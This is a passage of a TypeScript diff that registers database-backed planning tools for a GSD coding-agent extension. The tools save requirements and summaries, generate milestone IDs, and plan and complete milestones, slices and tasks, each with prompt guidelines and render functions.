+      text += theme.fg("dim", ` → REQUIREMENTS.md`);
+      return new Text(text, 0, 0);
+    },
   };
 
   pi.registerTool(requirementUpdateTool);
   registerAlias(pi, requirementUpdateTool, "gsd_update_requirement", "gsd_requirement_update");
 
+  // ─── gsd_requirement_save ─────────────────────────────────────────────
+
+  const requirementSaveExecute = async (_toolCallId: string, params: any, _signal: AbortSignal | undefined, _onUpdate: unknown, _ctx: unknown) => {
+    const dbAvailable = await ensureDbOpen();
+    if (!dbAvailable) {
+      return {
+        content: [{ type: "text" as const, text: "Error: GSD database is not available. Cannot save requirement." }],
+        details: { operation: "save_requirement", error: "db_unavailable" } as any,
+      };
+    }
+    try {
+      const { saveRequirementToDb } = await import("../db-writer.js");
+      const result = await saveRequirementToDb(
+        {
+          class: params.class,
+          status: params.status,
+          description: params.description,
+          why: params.why,
+          source: params.source,
+          primary_owner: params.primary_owner,
+          supporting_slices: params.supporting_slices,
+          validation: params.validation,
+          notes: params.notes,
+        },
+        process.cwd(),
+      );
+      return {
+        content: [{ type: "text" as const, text: `Saved requirement ${result.id}` }],
+        details: { operation: "save_requirement", id: result.id } as any,
+      };
+    } catch (err) {
+      const msg = err instanceof Error ? err.message : String(err);
+      logError("tool", `gsd_requirement_save tool failed: ${msg}`, { tool: "gsd_requirement_save", error: String(err) });
+      return {
+        content: [{ type: "text" as const, text: `Error saving requirement: ${msg}` }],
+        details: { operation: "save_requirement", error: msg } as any,
+      };
+    }
+  };
+
+  const requirementSaveTool = {
+    name: "gsd_requirement_save",
+    label: "Save Requirement",
+    description:
+      "Record a new requirement to the GSD database and regenerate REQUIREMENTS.md. " +
+      "Requirement IDs are auto-assigned — never provide an ID manually.",
+    promptSnippet: "Record a new GSD requirement to the database (auto-assigns ID, regenerates REQUIREMENTS.md)",
+    promptGuidelines: [
+      "Use gsd_requirement_save when recording a new functional, non-functional, or operational requirement.",
+      "Requirement IDs are auto-assigned (R001, R002, ...) — never guess or provide an ID.",
+      "class, description, why, and source are required. All other fields are optional.",
+      "The tool writes to the DB and regenerates .gsd/REQUIREMENTS.md automatically.",
+    ],
+    parameters: Type.Object({
+      class: Type.String({ description: "Requirement class (e.g. 'functional', 'non-functional', 'operational')" }),
+      description: Type.String({ description: "Short description of the requirement" }),
+      why: Type.String({ description: "Why this requirement matters" }),
+      source: Type.String({ description: "Origin of the requirement (e.g. 'user-research', 'design', 'M001')" }),
+      status: Type.Optional(Type.String({ description: "Status (default: 'active')" })),
+      primary_owner: Type.Optional(Type.String({ description: "Primary owning slice" })),
+      supporting_slices: Type.Optional(Type.String({ description: "Supporting slices" })),
+      validation: Type.Optional(Type.String({ description: "Validation criteria" })),
+      notes: Type.Optional(Type.String({ description: "Additional notes" })),
+    }),
+    execute: requirementSaveExecute,
+    renderCall(args: any, theme: any) {
+      let text = theme.fg("toolTitle", theme.bold("requirement_save "));
+      if (args.class) text += theme.fg("accent", `[${args.class}] `);
+      if (args.description) text += theme.fg("muted", args.description);
+      return new Text(text, 0, 0);
+    },
+    renderResult(result: any, _options: any, theme: any) {
+      const d = result.details;
+      if (result.isError || d?.error) {
+        return new Text(theme.fg("error", `Error: ${d?.error ?? "unknown"}`), 0, 0);
+      }
+      let text = theme.fg("success", `Requirement ${d?.id ?? ""} saved`);
+      text += theme.fg("dim", ` → REQUIREMENTS.md`);
+      return new Text(text, 0, 0);
+    },
+  };
+
+  pi.registerTool(requirementSaveTool);
+  registerAlias(pi, requirementSaveTool, "gsd_save_requirement", "gsd_requirement_save");
+
   // ─── gsd_summary_save (formerly gsd_save_summary) ──────────────────────
 
-  const summarySaveExecute = async (_toolCallId: any, params: any, _signal: any, _onUpdate: any, _ctx: any) => {
+  const summarySaveExecute = async (_toolCallId: string, params: any, _signal: AbortSignal | undefined, _onUpdate: unknown, _ctx: unknown) => {
     const dbAvailable = await ensureDbOpen();
     if (!dbAvailable) {
       return {
@@ -170,13 +293,23 @@ export function registerDbTools(pi: ExtensionAPI): void {
         details: { operation: "save_summary", error: "db_unavailable" } as any,
       };
     }
-    const validTypes = ["SUMMARY", "RESEARCH", "CONTEXT", "ASSESSMENT"];
-    if (!validTypes.includes(params.artifact_type)) {
+    if (!isSupportedSummaryArtifactType(params.artifact_type)) {
       return {
-        content: [{ type: "text" as const, text: `Error: Invalid artifact_type "${params.artifact_type}". Must be one of: ${validTypes.join(", ")}` }],
+        content: [{ type: "text" as const, text: `Error: Invalid artifact_type "${params.artifact_type}". Must be one of: ${SUPPORTED_SUMMARY_ARTIFACT_TYPES.join(", ")}` }],
         details: { operation: "save_summary", error: "invalid_artifact_type" } as any,
       };
     }
+    const contextGuard = shouldBlockContextArtifactSave(
+      params.artifact_type,
+      params.milestone_id ?? null,
+      params.slice_id ?? null,
+    );
+    if (contextGuard.block) {
+      return {
+        content: [{ type: "text" as const, text: `Error saving artifact: ${contextGuard.reason ?? "context write blocked"}` }],
+        details: { operation: "save_summary", error: "context_write_blocked" } as any,
+      };
+    }
     try {
       let relativePath: string;
       if (params.task_id && params.slice_id) {
@@ -204,7 +337,7 @@ export function registerDbTools(pi: ExtensionAPI): void {
       };
     } catch (err) {
       const msg = err instanceof Error ? err.message : String(err);
-      process.stderr.write(`gsd-db: gsd_summary_save tool failed: ${msg}\n`);
+      logError("tool", `gsd_summary_save tool failed: ${msg}`, { tool: "gsd_summary_save", error: String(err) });
       return {
         content: [{ type: "text" as const, text: `Error saving artifact: ${msg}` }],
         details: { operation: "save_summary", error: msg } as any,
@@ -220,19 +353,36 @@ export function registerDbTools(pi: ExtensionAPI): void {
       "Computes the file path from milestone/slice/task IDs automatically.",
     promptSnippet: "Save a GSD artifact (summary/research/context/assessment) to DB and disk",
     promptGuidelines: [
-      "Use gsd_summary_save to persist structured artifacts (SUMMARY, RESEARCH, CONTEXT, ASSESSMENT).",
+      "Use gsd_summary_save to persist structured artifacts (SUMMARY, RESEARCH, CONTEXT, ASSESSMENT, CONTEXT-DRAFT).",
       "milestone_id is required. slice_id and task_id are optional — they determine the file path.",
       "The tool computes the relative path automatically: milestones/M001/M001-SUMMARY.md, milestones/M001/slices/S01/S01-SUMMARY.md, etc.",
-      "artifact_type must be one of: SUMMARY, RESEARCH, CONTEXT, ASSESSMENT.",
+      "artifact_type must be one of: SUMMARY, RESEARCH, CONTEXT, ASSESSMENT, CONTEXT-DRAFT.",
+      "Use CONTEXT-DRAFT for incremental draft persistence; use CONTEXT for the final milestone context after depth verification.",
     ],
     parameters: Type.Object({
       milestone_id: Type.String({ description: "Milestone ID (e.g. M001)" }),
       slice_id: Type.Optional(Type.String({ description: "Slice ID (e.g. S01)" })),
       task_id: Type.Optional(Type.String({ description: "Task ID (e.g. T01)" })),
-      artifact_type: Type.String({ description: "One of: SUMMARY, RESEARCH, CONTEXT, ASSESSMENT" }),
+      artifact_type: Type.String({ description: "One of: SUMMARY, RESEARCH, CONTEXT, ASSESSMENT, CONTEXT-DRAFT" }),
       content: Type.String({ description: "The full markdown content of the artifact" }),
     }),
     execute: summarySaveExecute,
+    renderCall(args: any, theme: any) {
+      let text = theme.fg("toolTitle", theme.bold("summary_save "));
+      if (args.artifact_type) text += theme.fg("accent", args.artifact_type);
+      const path = [args.milestone_id, args.slice_id, args.task_id].filter(Boolean).join("/");
+      if (path) text += theme.fg("dim", ` ${path}`);
+      return new Text(text, 0, 0);
+    },
+    renderResult(result: any, _options: any, theme: any) {
+      const d = result.details;
+      if (result.isError || d?.error) {
+        return new Text(theme.fg("error", `Error: ${d?.error ?? "unknown"}`), 0, 0);
+      }
+      let text = theme.fg("success", `${d?.artifact_type ?? "Artifact"} saved`);
+      if (d?.path) text += theme.fg("dim", ` → ${d.path}`);
+      return new Text(text, 0, 0);
+    },
   };
 
   pi.registerTool(summarySaveTool);
@@ -240,12 +390,13 @@ export function registerDbTools(pi: ExtensionAPI): void {
 
   // ─── gsd_milestone_generate_id (formerly gsd_generate_milestone_id) ────
 
-  const milestoneGenerateIdExecute = async (_toolCallId: any, _params: any, _signal: any, _onUpdate: any, _ctx: any) => {
+  const milestoneGenerateIdExecute = async (_toolCallId: string, _params: any, _signal: AbortSignal | undefined, _onUpdate: unknown, _ctx: unknown) => {
     try {
       // Claim a reserved ID if the guided-flow already previewed one to the user.
       // This guarantees the ID shown in the UI matches the one materialised on disk.
       const reserved = claimReservedId();
       if (reserved) {
+        await ensureMilestoneDbRow(reserved);
         return {
           content: [{ type: "text" as const, text: reserved }],
           details: { operation: "generate_milestone_id", id: reserved, source: "reserved" } as any,
@@ -257,6 +408,7 @@ export function registerDbTools(pi: ExtensionAPI): void {
       const uniqueEnabled = !!loadEffectiveGSDPreferences()?.preferences?.unique_milestone_ids;
       const allIds = [...new Set([...existingIds, ...getReservedMilestoneIds()])];
       const newId = nextMilestoneId(allIds, uniqueEnabled);
+      await ensureMilestoneDbRow(newId);
       return {
         content: [{ type: "text" as const, text: newId }],
         details: { operation: "generate_milestone_id", id: newId, existingCount: existingIds.length, uniqueEnabled } as any,
@@ -270,6 +422,23 @@ export function registerDbTools(pi: ExtensionAPI): void {
     }
   };
 
+  /**
+   * Insert a minimal DB row for a milestone ID so it's visible to the state
+   * machine. Uses INSERT OR IGNORE — safe to call even if gsd_plan_milestone
+   * later writes the full row. Silently skips if the DB isn't available yet
+   * (pre-migration).
+   */
+  async function ensureMilestoneDbRow(milestoneId: string): Promise<void> {
+    const dbAvailable = await ensureDbOpen();
+    if (!dbAvailable) return;
+    try {
+      const { insertMilestone } = await import("../gsd-db.js");
+      insertMilestone({ id: milestoneId, status: "queued" });
+    } catch (e) {
+      logError("tool", `insertMilestone failed for ${milestoneId}: ${(e as Error).message}`);
+    }
+  }
+
   const milestoneGenerateIdTool = {
     name: "gsd_milestone_generate_id",
     label: "Generate Milestone ID",
@@ -286,8 +455,1025 @@ export function registerDbTools(pi: ExtensionAPI): void {
     ],
     parameters: Type.Object({}),
     execute: milestoneGenerateIdExecute,
+    renderCall(_args: any, theme: any) {
+      return new Text(theme.fg("toolTitle", theme.bold("milestone_generate_id")), 0, 0);
+    },
+    renderResult(result: any, _options: any, theme: any) {
+      const d = result.details;
+      if (result.isError || d?.error) {
+        return new Text(theme.fg("error", `Error: ${d?.error ?? "unknown"}`), 0, 0);
+      }
+      let text = theme.fg("success", `Generated ${d?.id ?? "ID"}`);
+      if (d?.source === "reserved") text += theme.fg("dim", " (reserved)");
+      return new Text(text, 0, 0);
+    },
   };
 
   pi.registerTool(milestoneGenerateIdTool);
   registerAlias(pi, milestoneGenerateIdTool, "gsd_generate_milestone_id", "gsd_milestone_generate_id");
+
+  // ─── gsd_plan_milestone (gsd_milestone_plan alias) ─────────────────────
+
+  const planMilestoneExecute = async (_toolCallId: string, params: any, _signal: AbortSignal | undefined, _onUpdate: unknown, _ctx: unknown) => {
+    const dbAvailable = await ensureDbOpen();
+    if (!dbAvailable) {
+      return {
+        content: [{ type: "text" as const, text: "Error: GSD database is not available. Cannot plan milestone." }],
+        details: { operation: "plan_milestone", error: "db_unavailable" } as any,
+      };
+    }
+    try {
+      const { handlePlanMilestone } = await import("../tools/plan-milestone.js");
+      const result = await handlePlanMilestone(params, process.cwd());
+      if ("error" in result) {
+        return {
+          content: [{ type: "text" as const, text: `Error planning milestone: ${result.error}` }],
+          details: { operation: "plan_milestone", error: result.error } as any,
+        };
+      }
+      return {
+        content: [{ type: "text" as const, text: `Planned milestone ${result.milestoneId}` }],
+        details: {
+          operation: "plan_milestone",
+          milestoneId: result.milestoneId,
+          roadmapPath: result.roadmapPath,
+        } as any,
+      };
+    } catch (err) {
+      const msg = err instanceof Error ? err.message : String(err);
+      logError("tool", `plan_milestone tool failed: ${msg}`, { tool: "gsd_plan_milestone", error: String(err) });
+      return {
+        content: [{ type: "text" as const, text: `Error planning milestone: ${msg}` }],
+        details: { operation: "plan_milestone", error: msg } as any,
+      };
+    }
+  };
+
+  const planMilestoneTool = {
+    name: "gsd_plan_milestone",
+    label: "Plan Milestone",
+    description:
+      "Write milestone planning state to the GSD database, render ROADMAP.md from DB, and clear caches after a successful render.",
+    promptSnippet: "Plan a milestone via DB write + roadmap render + cache invalidation",
+    promptGuidelines: [
+      "Use gsd_plan_milestone for milestone planning instead of writing ROADMAP.md directly.",
+      "Keep parameters flat and provide the full milestone planning payload, including slices.",
+      "The tool validates input, writes milestone and slice planning data transactionally, renders ROADMAP.md from DB, and clears both state and parse caches after success.",
+      "Use the canonical name gsd_plan_milestone; gsd_milestone_plan is only an alias.",
+    ],
+    parameters: Type.Object({
+      // ── Core identification + content (required) ──────────────────────
+      milestoneId: Type.String({ description: "Milestone ID (e.g. M001)" }),
+      title: Type.String({ description: "Milestone title" }),
+      vision: Type.String({ description: "Milestone vision" }),
+      slices: Type.Array(Type.Object({
+        sliceId: Type.String({ description: "Slice ID (e.g. S01)" }),
+        title: Type.String({ description: "Slice title" }),
+        risk: Type.String({ description: "Slice risk" }),
+        depends: Type.Array(Type.String(), { description: "Slice dependency IDs" }),
+        demo: Type.String({ description: "Roadmap demo text / After this" }),
+        goal: Type.String({ description: "Slice goal" }),
+        successCriteria: Type.String({ description: "Slice success criteria block" }),
+        proofLevel: Type.String({ description: "Slice proof level" }),
+        integrationClosure: Type.String({ description: "Slice integration closure" }),
+        observabilityImpact: Type.String({ description: "Slice observability impact" }),
+      }), { description: "Planned slices for the milestone" }),
+      // ── Enrichment metadata (optional — defaults to empty) ────────────
+      status: Type.Optional(Type.String({ description: "Milestone status (defaults to active)" })),
+      dependsOn: Type.Optional(Type.Array(Type.String(), { description: "Milestone dependencies" })),
+      successCriteria: Type.Optional(Type.Array(Type.String(), { description: "Top-level success criteria bullets" })),
+      keyRisks: Type.Optional(Type.Array(Type.Object({
+        risk: Type.String({ description: "Risk statement" }),
+        whyItMatters: Type.String({ description: "Why the risk matters" }),
+      }), { description: "Structured risk entries" })),
+      proofStrategy: Type.Optional(Type.Array(Type.Object({
+        riskOrUnknown: Type.String({ description: "Risk or unknown to retire" }),
+        retireIn: Type.String({ description: "Where it will be retired" }),
+        whatWillBeProven: Type.String({ description: "What proof will be produced" }),
+      }), { description: "Structured proof strategy entries" })),
+      verificationContract: Type.Optional(Type.String({ description: "Verification contract text" })),
+      verificationIntegration: Type.Optional(Type.String({ description: "Integration verification text" })),
+      verificationOperational: Type.Optional(Type.String({ description: "Operational verification text" })),
+      verificationUat: Type.Optional(Type.String({ description: "UAT verification text" })),
+      definitionOfDone: Type.Optional(Type.Array(Type.String(), { description: "Definition of done bullets" })),
+      requirementCoverage: Type.Optional(Type.String({ description: "Requirement coverage text" })),
+      boundaryMapMarkdown: Type.Optional(Type.String({ description: "Boundary map markdown block" })),
+    }),
+    execute: planMilestoneExecute,
+  };
+
+  pi.registerTool(planMilestoneTool);
+  registerAlias(pi, planMilestoneTool, "gsd_milestone_plan", "gsd_plan_milestone");
+
+  // ─── gsd_plan_slice (gsd_slice_plan alias) ─────────────────────────────
+
+  const planSliceExecute = async (_toolCallId: string, params: any, _signal: AbortSignal | undefined, _onUpdate: unknown, _ctx: unknown) => {
+    const dbAvailable = await ensureDbOpen();
+    if (!dbAvailable) {
+      return {
+        content: [{ type: "text" as const, text: "Error: GSD database is not available. Cannot plan slice." }],
+        details: { operation: "plan_slice", error: "db_unavailable" } as any,
+      };
+    }
+    try {
+      const { handlePlanSlice } = await import("../tools/plan-slice.js");
+      const result = await handlePlanSlice(params, process.cwd());
+      if ("error" in result) {
+        return {
+          content: [{ type: "text" as const, text: `Error planning slice: ${result.error}` }],
+          details: { operation: "plan_slice", error: result.error } as any,
+        };
+      }
+      return {
+        content: [{ type: "text" as const, text: `Planned slice ${result.sliceId} (${result.milestoneId})` }],
+        details: {
+          operation: "plan_slice",
+          milestoneId: result.milestoneId,
+          sliceId: result.sliceId,
+          planPath: result.planPath,
+          taskPlanPaths: result.taskPlanPaths,
+        } as any,
+      };
+    } catch (err) {
+      const msg = err instanceof Error ? err.message : String(err);
+      logError("tool", `plan_slice tool failed: ${msg}`, { tool: "gsd_plan_slice", error: String(err) });
+      return {
+        content: [{ type: "text" as const, text: `Error planning slice: ${msg}` }],
+        details: { operation: "plan_slice", error: msg } as any,
+      };
+    }
+  };
+
+  const planSliceTool = {
+    name: "gsd_plan_slice",
+    label: "Plan Slice",
+    description:
+      "Write slice planning state to the GSD database, render S##-PLAN.md plus task PLAN artifacts from DB, and clear caches after a successful render.",
+    promptSnippet: "Plan a slice via DB write + PLAN render + cache invalidation",
+    promptGuidelines: [
+      "Use gsd_plan_slice for slice planning instead of writing S##-PLAN.md or task PLAN files directly.",
+      "Keep parameters flat and provide the full slice planning payload, including tasks.",
+      "The tool validates input, requires an existing parent slice, writes slice/task planning data, renders PLAN.md and task plan files from DB, and clears both state and parse caches after success.",
+      "Use the canonical name gsd_plan_slice; gsd_slice_plan is only an alias.",
+    ],
+    parameters: Type.Object({
+      // ── Core identification + content (required) ──────────────────────
+      milestoneId: Type.String({ description: "Milestone ID (e.g. M001)" }),
+      sliceId: Type.String({ description: "Slice ID (e.g. S01)" }),
+      goal: Type.String({ description: "Slice goal" }),
+      tasks: Type.Array(Type.Object({
+        taskId: Type.String({ description: "Task ID (e.g. T01)" }),
+        title: Type.String({ description: "Task title" }),
+        description: Type.String({ description: "Task description / steps block" }),
+        estimate: Type.String({ description: "Task estimate string" }),
+        files: Type.Array(Type.String(), { description: "Files likely touched" }),
+        verify: Type.String({ description: "Verification command or block" }),
+        inputs: Type.Array(Type.String(), { description: "Input files or references" }),
+        expectedOutput: Type.Array(Type.String(), { description: "Expected output files or artifacts" }),
+        observabilityImpact: Type.Optional(Type.String({ description: "Task observability impact" })),
+      }), { description: "Planned tasks for the slice" }),
+      // ── Enrichment metadata (optional — defaults to empty) ────────────
+      successCriteria: Type.Optional(Type.String({ description: "Slice success criteria block" })),
+      proofLevel: Type.Optional(Type.String({ description: "Slice proof level" })),
+      integrationClosure: Type.Optional(Type.String({ description: "Slice integration closure" })),
+      observabilityImpact: Type.Optional(Type.String({ description: "Slice observability impact" })),
+    }),
+    execute: planSliceExecute,
+  };
+
+  pi.registerTool(planSliceTool);
+  registerAlias(pi, planSliceTool, "gsd_slice_plan", "gsd_plan_slice");
+
+  // ─── gsd_plan_task (gsd_task_plan alias) ───────────────────────────────
+
+  const planTaskExecute = async (_toolCallId: string, params: any, _signal: AbortSignal | undefined, _onUpdate: unknown, _ctx: unknown) => {
+    const dbAvailable = await ensureDbOpen();
+    if (!dbAvailable) {
+      return {
+        content: [{ type: "text" as const, text: "Error: GSD database is not available. Cannot plan task." }],
+        details: { operation: "plan_task", error: "db_unavailable" } as any,
+      };
+    }
+    try {
+      const { handlePlanTask } = await import("../tools/plan-task.js");
+      const result = await handlePlanTask(params, process.cwd());
+      if ("error" in result) {
+        return {
+          content: [{ type: "text" as const, text: `Error planning task: ${result.error}` }],
+          details: { operation: "plan_task", error: result.error } as any,
+        };
+      }
+      return {
+        content: [{ type: "text" as const, text: `Planned task ${result.taskId} (${result.sliceId}/${result.milestoneId})` }],
+        details: {
+          operation: "plan_task",
+          milestoneId: result.milestoneId,
+          sliceId: result.sliceId,
+          taskId: result.taskId,
+          taskPlanPath: result.taskPlanPath,
+        } as any,
+      };
+    } catch (err) {
+      const msg = err instanceof Error ? err.message : String(err);
+      logError("tool", `plan_task tool failed: ${msg}`, { tool: "gsd_plan_task", error: String(err) });
+      return {
+        content: [{ type: "text" as const, text: `Error planning task: ${msg}` }],
+        details: { operation: "plan_task", error: msg } as any,
+      };
+    }
+  };
+
+  const planTaskTool = {
+    name: "gsd_plan_task",
+    label: "Plan Task",
+    description:
+      "Write task planning state to the GSD database, render tasks/T##-PLAN.md from DB, and clear caches after a successful render.",
+    promptSnippet: "Plan a task via DB write + task PLAN render + cache invalidation",
+    promptGuidelines: [
+      "Use gsd_plan_task for task planning instead of writing tasks/T##-PLAN.md directly.",
+      "Keep parameters flat and provide the full task planning payload.",
+      "The tool validates input, requires an existing parent slice, writes task planning data, renders the task PLAN file from DB, and clears both state and parse caches after success.",
+      "Use the canonical name gsd_plan_task; gsd_task_plan is only an alias.",
+    ],
+    parameters: Type.Object({
+      milestoneId: Type.String({ description: "Milestone ID (e.g. M001)" }),
+      sliceId: Type.String({ description: "Slice ID (e.g. S01)" }),
+      taskId: Type.String({ description: "Task ID (e.g. T01)" }),
+      title: Type.String({ description: "Task title" }),
+      description: Type.String({ description: "Task description / steps block" }),
+      estimate: Type.String({ description: "Task estimate string" }),
+      files: Type.Array(Type.String(), { description: "Files likely touched" }),
+      verify: Type.String({ description: "Verification command or block" }),
+      inputs: Type.Array(Type.String(), { description: "Input files or references" }),
+      expectedOutput: Type.Array(Type.String(), { description: "Expected output files or artifacts" }),
+      observabilityImpact: Type.Optional(Type.String({ description: "Task observability impact" })),
+    }),
+    execute: planTaskExecute,
+  };
+
+  pi.registerTool(planTaskTool);
+  registerAlias(pi, planTaskTool, "gsd_task_plan", "gsd_plan_task");
+
+  // ─── gsd_task_complete (gsd_complete_task alias) ────────────────────────
+
+  const taskCompleteExecute = async (_toolCallId: string, params: any, _signal: AbortSignal | undefined, _onUpdate: unknown, _ctx: unknown) => {
+    const dbAvailable = await ensureDbOpen();
+    if (!dbAvailable) {
+      return {
+        content: [{ type: "text" as const, text: "Error: GSD database is not available. Cannot complete task." }],
+        details: { operation: "complete_task", error: "db_unavailable" } as any,
+      };
+    }
+    try {
+      // Coerce string items to objects for verificationEvidence (#3541).
+      const coerced = { ...params };
+      coerced.verificationEvidence = (params.verificationEvidence ?? []).map((v: any) =>
+        typeof v === "string" ? { command: v, exitCode: -1, verdict: "unknown (coerced from string)", durationMs: 0 } : v,
+      );
+
+      const { handleCompleteTask } = await import("../tools/complete-task.js");
+      const result = await handleCompleteTask(coerced, process.cwd());
+      if ("error" in result) {
+        return {
+          content: [{ type: "text" as const, text: `Error completing task: ${result.error}` }],
+          details: { operation: "complete_task", error: result.error } as any,
+        };
+      }
+      return {
+        content: [{ type: "text" as const, text: `Completed task ${result.taskId} (${result.sliceId}/${result.milestoneId})` }],
+        details: {
+          operation: "complete_task",
+          taskId: result.taskId,
+          sliceId: result.sliceId,
+          milestoneId: result.milestoneId,
+          summaryPath: result.summaryPath,
+        } as any,
+      };
+    } catch (err) {
+      const msg = err instanceof Error ? err.message : String(err);
+      logError("tool", `complete_task tool failed: ${msg}`, { tool: "gsd_task_complete", error: String(err) });
+      return {
+        content: [{ type: "text" as const, text: `Error completing task: ${msg}` }],
+        details: { operation: "complete_task", error: msg } as any,
+      };
+    }
+  };
+
+  const taskCompleteTool = {
+    name: "gsd_task_complete",
+    label: "Complete Task",
+    description:
+      "Record a completed task to the GSD database, render a SUMMARY.md to disk, and toggle the plan checkbox — all in one atomic operation. " +
+      "Writes the task row inside a transaction, then performs filesystem writes outside the transaction.",
+    promptSnippet: "Complete a GSD task (DB write + summary render + checkbox toggle)",
+    promptGuidelines: [
+      "Use gsd_task_complete (or gsd_complete_task) when a task is finished and needs to be recorded.",
+      "All string fields are required. verificationEvidence is an array of objects with command, exitCode, verdict, durationMs.",
+      "The tool validates required fields and returns an error message if any are missing.",
+      "On success, returns the summaryPath where the SUMMARY.md was written.",
+      "Idempotent — calling with the same params twice will upsert (INSERT OR REPLACE) without error.",
+    ],
+    parameters: Type.Object({
+      // ── Core identification + content (required) ──────────────────────
+      taskId: Type.String({ description: "Task ID (e.g. T01)" }),
+      sliceId: Type.String({ description: "Slice ID (e.g. S01)" }),
+      milestoneId: Type.String({ description: "Milestone ID (e.g. M001)" }),
+      oneLiner: Type.String({ description: "One-line summary of what was accomplished" }),
+      narrative: Type.String({ description: "Detailed narrative of what happened during the task" }),
+      verification: Type.String({ description: "What was verified and how — commands run, tests passed, behavior confirmed" }),
+      // ── Enrichment metadata (optional — defaults to empty) ────────────
+      deviations: Type.Optional(Type.String({ description: "Deviations from the task plan, or 'None.'" })),
+      knownIssues: Type.Optional(Type.String({ description: "Known issues discovered but not fixed, or 'None.'" })),
+      keyFiles: Type.Optional(Type.Array(Type.String(), { description: "List of key files created or modified" })),
+      keyDecisions: Type.Optional(Type.Array(Type.String(), { description: "List of key decisions made during this task" })),
+      blockerDiscovered: Type.Optional(Type.Boolean({ description: "Whether a plan-invalidating blocker was discovered" })),
+      verificationEvidence: Type.Optional(Type.Array(
+        Type.Union([
+          Type.Object({
+            command: Type.String({ description: "Verification command that was run" }),
+            exitCode: Type.Number({ description: "Exit code of the command" }),
+            verdict: Type.String({ description: "Pass/fail verdict (e.g. '✅ pass', '❌ fail')" }),
+            durationMs: Type.Number({ description: "Duration of the command in milliseconds" }),
+          }),
+          Type.String({ description: "Fallback: verification summary string" }),
+        ]),
+        { description: "Array of verification evidence entries" },
+      )),
+    }),
+    execute: taskCompleteExecute,
+  };
+
+  pi.registerTool(taskCompleteTool);
+  registerAlias(pi, taskCompleteTool, "gsd_complete_task", "gsd_task_complete");
+
+  // ─── gsd_slice_complete (gsd_complete_slice alias) ─────────────────────
+
+  const sliceCompleteExecute = async (_toolCallId: string, params: any, _signal: AbortSignal | undefined, _onUpdate: unknown, _ctx: unknown) => {
+    const dbAvailable = await ensureDbOpen();
+    if (!dbAvailable) {
+      return {
+        content: [{ type: "text" as const, text: "Error: GSD database is not available. Cannot complete slice." }],
+        details: { operation: "complete_slice", error: "db_unavailable" } as any,
+      };
+    }
+    try {
+      // Coerce string items to objects for fields where LLMs sometimes pass
+      // plain strings instead of the expected { key, value } shape (#3541).
+      // Parses "key — value" or "key - value" format when possible.
+      const splitPair = (s: string): [string, string] => {
+        const m = s.match(/^(.+?)\s*(?:—|-)\s+(.+)$/);
+        return m ? [m[1].trim(), m[2].trim()] : [s.trim(), ""];
+      };
+      const coerced = { ...params };
+      // Coerce simple string-array fields: LLMs sometimes pass a plain string
+      // instead of a single-element array (#3585).
+      const wrapArray = (v: any): any[] =>
+        v == null ? [] : Array.isArray(v) ? v : [v];
+      coerced.provides = wrapArray(params.provides);
+      coerced.keyFiles = wrapArray(params.keyFiles);
+      coerced.keyDecisions = wrapArray(params.keyDecisions);
+      coerced.patternsEstablished = wrapArray(params.patternsEstablished);
+      coerced.observabilitySurfaces = wrapArray(params.observabilitySurfaces);
+      coerced.requirementsSurfaced = wrapArray(params.requirementsSurfaced);
+      coerced.drillDownPaths = wrapArray(params.drillDownPaths);
+      coerced.affects = wrapArray(params.affects);
+      coerced.filesModified = wrapArray(params.filesModified).map((f: any) => {
+        if (typeof f !== "string") return f;
+        const [path, description] = splitPair(f);
+        return { path, description };
+      });
+      coerced.requires = wrapArray(params.requires).map((r: any) => {
+        if (typeof r !== "string") return r;
+        const [slice, provides] = splitPair(r);
+        return { slice, provides };
+      });
+      coerced.requirementsAdvanced = wrapArray(params.requirementsAdvanced).map((r: any) => {
+        if (typeof r !== "string") return r;
+        const [id, how] = splitPair(r);
+        return { id, how };
+      });
+      coerced.requirementsValidated = wrapArray(params.requirementsValidated).map((r: any) => {
+        if (typeof r !== "string") return r;
+        const [id, proof] = splitPair(r);
+        return { id, proof };
+      });
+      coerced.requirementsInvalidated = wrapArray(params.requirementsInvalidated).map((r: any) => {
+        if (typeof r !== "string") return r;
+        const [id, what] = splitPair(r);
+        return { id, what };
+      });
+
+      const { handleCompleteSlice } = await import("../tools/complete-slice.js");
+      const result = await handleCompleteSlice(coerced, process.cwd());
+      if ("error" in result) {
+        return {
+          content: [{ type: "text" as const, text: `Error completing slice: ${result.error}` }],
+          details: { operation: "complete_slice", error: result.error } as any,
+        };
+      }
+      return {
+        content: [{ type: "text" as const, text: `Completed slice ${result.sliceId} (${result.milestoneId})` }],
+        details: {
+          operation: "complete_slice",
+          sliceId: result.sliceId,
+          milestoneId: result.milestoneId,
+          summaryPath: result.summaryPath,
+          uatPath: result.uatPath,
+        } as any,
+      };
+    } catch (err) {
+      const msg = err instanceof Error ? err.message : String(err);
+      logError("tool", `complete_slice tool failed: ${msg}`, { tool: "gsd_slice_complete", error: String(err) });
+      return {
+        content: [{ type: "text" as const, text: `Error completing slice: ${msg}` }],
+        details: { operation: "complete_slice", error: msg } as any,
+      };
+    }
+  };
+
+  const sliceCompleteTool = {
+    name: "gsd_slice_complete",
+    label: "Complete Slice",
+    description:
+      "Record a completed slice to the GSD database, render SUMMARY.md + UAT.md to disk, and toggle the roadmap checkbox — all in one atomic operation. " +
+      "Validates all tasks are complete before proceeding. Writes the slice row inside a transaction, then performs filesystem writes outside the transaction.",
+    promptSnippet: "Complete a GSD slice (DB write + summary/UAT render + roadmap checkbox toggle)",
+    promptGuidelines: [
+      "Use gsd_slice_complete (or gsd_complete_slice) when all tasks in a slice are finished and the slice needs to be recorded.",
+      "All tasks in the slice must have status 'complete' — the handler validates this before proceeding.",
+      "On success, returns summaryPath and uatPath where the files were written.",
+      "Idempotent — calling with the same params twice will not crash.",
+    ],
+    parameters: Type.Object({
+      // ── Core identification + content (required) ──────────────────────
+      sliceId: Type.String({ description: "Slice ID (e.g. S01)" }),
+      milestoneId: Type.String({ description: "Milestone ID (e.g. M001)" }),
+      sliceTitle: Type.String({ description: "Title of the slice" }),
+      oneLiner: Type.String({ description: "One-line summary of what the slice accomplished" }),
+      narrative: Type.String({ description: "Detailed narrative of what happened across all tasks" }),
+      verification: Type.String({ description: "What was verified across all tasks" }),
+      uatContent: Type.String({ description: "UAT test content (markdown body)" }),
+      // ── Enrichment metadata (optional — defaults to empty) ────────────
+      deviations: Type.Optional(Type.String({ description: "Deviations from the slice plan, or 'None.'" })),
+      knownLimitations: Type.Optional(Type.String({ description: "Known limitations or gaps, or 'None.'" })),
+      followUps: Type.Optional(Type.String({ description: "Follow-up work discovered during execution, or 'None.'" })),
